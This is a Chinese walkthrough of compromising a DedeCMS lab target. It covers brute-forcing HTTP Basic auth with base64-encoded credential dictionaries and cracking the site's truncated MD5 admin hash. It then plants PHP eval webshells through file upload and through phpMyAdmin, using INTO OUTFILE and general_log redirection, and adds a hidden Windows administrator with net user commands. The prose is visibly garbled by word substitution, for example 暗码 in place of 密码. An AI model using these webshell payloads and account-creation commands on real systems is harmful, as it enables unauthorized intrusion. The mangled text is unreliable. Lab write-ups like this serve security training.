DEDECMS-案例分析

DEDECMS-案例分析

1、信息采集

通过Wappalyzer获取CMS、操纵系统、编程语言和数据库管理器等信息

御剑目录扫描

并未扫描到任何信息，大概率是认证问题

输入账号暗码抓个包看看

Basic认证
Basic认证过程简单介绍
浏览器请求一个必要认证的网页。
服务器向浏览器返回“401 Unauthorized（未认证）”状态码。
浏览器收到此状态码后，扣问用户名和暗码。
浏览器发送附带认证信息（Authorization头信息）的请求。
本次请求得到了文档（用户名暗码均正确的情况下) 。
其中YWRtaW46MTIz是username:password(admin:123)经过base64加密得到的效果
2、弱口令爆破

这里就要尝试一些fuzz爆破
playload格式 用户名字典+ :+暗码字典，对有效载荷处理添加base64编码

可以看到一个200响应，base64解码后得到账号暗码

登陆得到key1

目录扫描可以用BP抓包，加上御剑的字典爆破
留意肯定不要选择有效载荷编码

将效果保存为txt文档

进入key.txt，得到key2

前面信息采集的时候就已经知道了数据库管理器是phpMyAdmin

还是尝试一下fuzz爆破，通过弱口令检查工具得到数据库用户名和暗码，以是说这个admin就是一个干扰选项

进入数据库后台后找到admin的暗码，到这一部的时候就又要用我们前面的信息，CMS是DedeCMS，那么就有个特点，dede 的暗码怎么破解，dede后台。32位的DEDE暗码怎样破解
dede 的暗码是32位MD5减去头5位，减去尾七位，得到20 MD5暗码，方法是，前减3后减1，得到16位MD5。
比如我的数据库的密文是：cca77804d2ba1922c33e
得到20 MD5暗码，方法是，前减3后减1，得到16位MD5
这样实行后就是77804d2ba1922c33
直接md5解密：888888

可以正常进入后台

文件上传 getshell

在后台上传一个png类型文件，写入马，改后缀

在附件数据管理中找到上传文件路径

可以正常实行，蚁剑添加Authorized头部可以正常连接

phpMyAdmin get shell

参考文章：https://xz.aliyun.com/t/3283
(1) 直接写shell

前提三个条件：对web目录具有写入条件(dba用户)、知道网站的路径(探针phpinfo、报错、目录扫描等等)、secure_file_pri要具有导出权限，必要为空大概详细的一个web路径
查询secure_file_priv的值，当前为空

1. select @@secure_file_priv;
2. show GLOBAL VARIABLES like '%secure_file%';

复制代码

查找路径

1. SELECT @@basedir;

复制代码

1. SELECT '<?php eval($_POST[x]); ?>' INTO OUTFILE 'C:/phpStudy/MySQL/xiaodisec.php';

复制代码

在蚁剑上可以看到已经上传了，知蹊径径就可以利用(可以根据MYSQL路径猜网站根目录，后面说)

(2) 日记文件写shell

因为在mysql5.0以上，mysql官方把secure_file_pri参数默认设为NULL，以是无法举行导入导出，mysql有日记功能可以优化SQL语句

• 查询mysql日记功能是否开启
  

1. SHOW VARIABLES LIKE '%general%'

复制代码

General_log 表现日记功能是否打开
General_log_file 代表日记存储的位置

• 修改日记功能开头以及日记位置
  

1. SET GLOBAL general_log = on;
2. SET GLOBAL general_log_file='C:/phpStudy/MySQL/xiaodisec.php';
3. SELECT '<?php @eval($_POST[x]);?>';

复制代码

• 根据前面查到的日记路径可以判断，这个网站是小皮搭建的，大差不差就能猜到网站路径
  

1. C:/phpStudy/www
2. SET GLOBAL general_log_file='C:/phpStudy/www/xiaodisec.php'

复制代码

远程连接

先用nmap查看是否开启远程连接

1. nmap -p 3389 10.0.0.163

复制代码

在御剑命令行中能看到当前为管理员用户

但是很显着账号不匹配(与admin，888888)这个数据库后台管理员

1. net user xiaodi 123456 /add
2. net localgroup administrators xiaodi /add
3. net localgroup administrators

复制代码

添加管理员用户成功

远程连接失败的原因

1. 远程桌面失败也有很多其他原因，例如：
2. 1.攻击机与目标机是否连通，ping命令即可验证。
3. 2.目标机器是否开启了远程桌面服务
4. 3.kali中/etc/ssh/sshd_config文件，X11 forwarding 是否设置为 yes?
5. 4.也有博主说kali默认安装的rdesktop容易出现问题，卸载，重装。apt-get remove/install rdesktop 两条命令即可！

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。